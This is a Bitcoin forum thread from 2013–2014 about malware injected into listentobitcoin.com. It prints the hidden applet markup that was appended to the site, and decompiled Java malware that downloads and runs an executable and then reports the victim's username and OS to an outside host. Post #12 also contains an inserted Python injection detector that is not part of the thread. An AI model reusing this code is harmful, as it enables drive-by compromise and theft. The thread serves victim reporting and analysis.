Bitcoin Forum
Author Topic: Got this risk message, can someone elaborate on the listentobitcoin malware?  (Read 3672 times)
coastermonger (OP)
Sr. Member
August 11, 2013, 07:52:39 PM
#1

FIRST PRIORITY, DO NOT GO TO LISTEN TO BITCOIN . COM

Saw this message come up from one of my AV recently. 

along with a reddit post from the creator, apologizing for what happened to the site:
http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Can anyone elaborate on what kind of malware exists or existed at this site?  I was browsing with chrome and unfortunately hadn't seen the post yet.  I visited listentobitcoin, but chrome didn't bring up any warning and I wasn't asked to install anything. 

I'm curious what steps I need to take to make sure that my computer is clear.

alp
Full Member
August 11, 2013, 08:55:23 PM
#2

Make sure it's clear?  Reformat.

SlickTheNick
Full Member
August 11, 2013, 09:20:30 PM
#3

Hint: for the most part, anti-virus software is mostly snake oil, especially McAfee, Norton, etc.

DiamondCardz
Legendary
August 11, 2013, 09:33:44 PM
#4

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

BA Computer Science, University of Oxford
Dissertation was about threat modelling on distributed ledgers.
Nagle
Legendary
December 02, 2013, 10:42:19 PM
#5

Quote from: DiamondCardz on August 11, 2013, 09:33:44 PM
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"
Remember remember the 5th of November
Legendary
Reverse engineer from time to time
December 03, 2013, 05:08:56 AM
#6

Quote from: Nagle on December 02, 2013, 10:42:19 PM
Quote from: DiamondCardz on August 11, 2013, 09:33:44 PM
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

Look at the date of the thread, please!

DiamondCardz
Legendary
December 03, 2013, 06:46:48 PM
#7

Quote from: Nagle on December 02, 2013, 10:42:19 PM
Quote from: DiamondCardz on August 11, 2013, 09:33:44 PM
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

First, nice gravedig.
Second, you're a retard.
Third, you probably haven't even gone on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

Finally, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Please get your facts together before you try to spread FUD about something you know nothing about. Thanks.

Nagle
Legendary
December 05, 2013, 04:02:04 AM
#8

Quote from: DiamondCardz on December 03, 2013, 06:46:48 PM
Third, you probably haven't even gone on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.  But I think there's a bug in Firefox's playing of audio files which results in choppy audio.  Both sites will produce choppy audio after they've been running for a while. Once this has happened, Firefox has to be restarted to fix the problem. This appears under both Windows 7 and Linux.
DiamondCardz
Legendary
December 05, 2013, 06:54:58 AM
#9

Quote from: Nagle on December 05, 2013, 04:02:04 AM
Quote from: DiamondCardz on December 03, 2013, 06:46:48 PM
Third, you probably haven't even gone on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.
I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.

Interesting. I don't know how the domain might have been re-acquired, but it was throwing up malware.

devthedev
Legendary
December 09, 2013, 02:39:38 PM
#10

I said this below, but I want it to be a part of this post as well: I realize now that I made a very foolish mistake by selling the domain to someone untrustworthy, and I want to personally apologize to everyone who has been affected. I was too trusting, I made a huge mistake, and for what my words are worth, I promise that it won’t happen again.

~Maximillian Laumeister

http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/

nfuse
Member
January 05, 2014, 03:14:51 AM
#11

Well, for me it was too late. I lost 0.47 BTC and 15 LTC today because of this shit. About 23 December I visited listentobitcoin.com, and today I found out my cryptsy.com account was emptied.

After searching, I found in the Java logs the answer that says it all:

    http://listentobitcoin.info/sezam.exe   188.165.49.114    <null> HTTP/1.1 200 OK content-length 502272
last-modified Fri, 20 Dec 2013 17:50:53 GMT expires Mon, 06 Jan 2014 15:44:16 GMT content-type application/octet-stream date Mon, 23 Dec 2013 15:44:16 GMT server nginx
cache-control max-age=1209600

sezam.exe creates a directory called /directory/cybergate/googleupdate.exe, which allowed the hacker (lowlife scum) to access my laptop when I was away.

I hopefully learned my lesson and am using 2FA for now. Now I just need something to put back on my account.

If you, thief, have a change of heart and want to sleep better at night, please return my BTC to 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk
Nagle
Legendary
January 05, 2014, 08:03:07 AM
#12

The malware seems to be back. At the end of "www.listentobitcoin.com" is this code:

Code:
<applet name="JavaUpdate" code="Client.class" archive="http://secure-jar.com/PLFG/Java.jar" width="0" height="0">
<param name="us" value="javasan.exe">
<param name="ca" value="http://ge.tt/api/1/files/4mRU7fB1/0/blob?download">
<param name="uk" value="http://www.listentobitcoin.com">
<param name="nl" value="fox33">
</applet>
This is appended to the end of the page, outside the </html> tag. This looks like something a break-in attack appended automatically and blindly.
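A defender-side check for the injection pattern described in this post, added here as an example and not code from the thread: it reports any markup trailing the closing </html> tag and flags applets showing the indicators above (zero size, a jar archive or param URL on a host other than the site's own, a param naming an .exe). The sample page, hostnames and file names are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
# Constructed sample (not the real site): a normal document with a hidden
# applet appended after </html>, the pattern described in the post above.
SAMPLE_PAGE = """<html><head><title>demo</title></head>
<body><p>bubbles</p></body></html>
<applet name="JavaUpdate" code="Client.class" archive="http://jar-host.example/Java.jar" width="0" height="0">
<param name="us" value="update.exe">
<param name="ca" value="http://files.example/blob?download">
</applet>
"""
def trailing_after_html(page: str) -> str:
    """Return any markup found after the last </html>; '' for a well-formed page."""
    idx = page.lower().rfind("</html>")
    return "" if idx == -1 else page[idx + len("</html>"):].strip()
class AppletCollector(HTMLParser):
    """Collect every <applet> with its attributes and nested <param> name/value pairs."""
    def __init__(self):
        super().__init__()
        self.applets, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":
            self._cur = {"attrs": a, "params": {}}
            self.applets.append(self._cur)
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name")] = a.get("value") or ""
    def handle_endtag(self, tag):
        if tag == "applet": self._cur = None

def suspicious_applets(page: str, own_host: str) -> list:
    """Return (applet name, reasons) for applets showing the thread's indicators."""
    parser = AppletCollector()
    parser.feed(page)
    findings = []
    for ap in parser.applets:
        attrs, reasons = ap["attrs"], []
        if attrs.get("width") == "0" or attrs.get("height") == "0":
            reasons.append("zero-size applet")
        jar_host = urlparse(attrs.get("archive", "")).hostname
        if jar_host and jar_host != own_host:
            reasons.append("archive loaded from foreign host " + jar_host)
        for value in ap["params"].values():
            if value.lower().endswith(".exe"):
                reasons.append("param names an executable: " + value)
            elif urlparse(value).hostname not in (None, own_host):
                reasons.append("param points to foreign URL: " + value)
        if reasons:
            findings.append((attrs.get("name"), reasons))
    return findings
```

Run both functions over a page fetched from your own site (with `own_host` set to its hostname) after any suspected defacement; a clean page yields an empty string and an empty list.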
daviducsb
Full Member
January 06, 2014, 10:22:28 AM
#13

Are Apple computers susceptible to the malware on listentobitcoins or only PCs? If one visited the site on an Apple is one at risk?
daviducsb
Full Member
January 06, 2014, 05:55:14 PM
#14

Hello... Anybody... Is it a threat to Apple Macs?

thx
someguy123
Sr. Member
CEO of Privex Inc. (www.privex.io)
January 18, 2014, 08:06:04 PM
#15

I decompiled their Java file and it seems to be some kind of download script. Here's Malwarebytes' post about it: http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/

Here's the decompiled source code for any security people:
Code:
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class SecureJAR extends Applet
{
  public void init()
  {
    String str1 = System.getProperty("user.name");
    String str2 = System.getProperty("os.name");
    String str3 = System.getenv("temp");
    String str4 = "\\";
    String str5 = getParameter("rgsicvnjbn");
    String str6 = str4.concat(str5);
    String str7 = str3.concat(str6);
    Object localObject = getParameter("ioqujbjsyq");
    String str8 = "&yuvcpearce=";
    String str9 = getParameter("ivmbhojyjv");
    try
    {
      str2 = str2.replace(" ", "%20");
      str1 = str1.replace(" ", "%20");
      FileOutputStream localFileOutputStream = new FileOutputStream(str7);
      Runtime localRuntime = Runtime.getRuntime();
      URL localURL1 = new URL(getParameter("xmxdnhwphy"));
      URLConnection localURLConnection = localURL1.openConnection();
      InputStream localInputStream = localURLConnection.getInputStream();
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
        localFileOutputStream.write(arrayOfByte, 0, i);
      localInputStream.close();
      localFileOutputStream.close();
      localRuntime.exec(str7);
      localObject = new URL((String)localObject);
      getAppletContext().showDocument((URL)localObject);
      URL localURL2 = new URL("http://epickit.net/qsxnonlvrc.php?username=" + str9 + str8.replace("yuvcpearce", "evyaipgncs") + str2 + str8.replace("yuvcpearce", "piyhnvzbpw") + str1 + str8.replace("yuvcpearce", "tlbkqdpvxm") + "Traditional");
      localURL2.openStream();
    }
    catch (Exception localException)
    {
    }
  }
}

someguy123
Sr. Member
CEO of Privex Inc. (www.privex.io)
January 18, 2014, 08:16:19 PM
#16

Quote from: daviducsb on January 06, 2014, 05:55:14 PM
Hello... Anybody... Is it a threat to Apple Macs?

thx

The virus appears to download an EXE payload. Whether or not it has alternative payloads for Mac or Linux is unknown, but if you've visited the site and allowed the JAR to run, you may want to run some form of mac security program, as it's now detected by a good amount of antivirus programs.
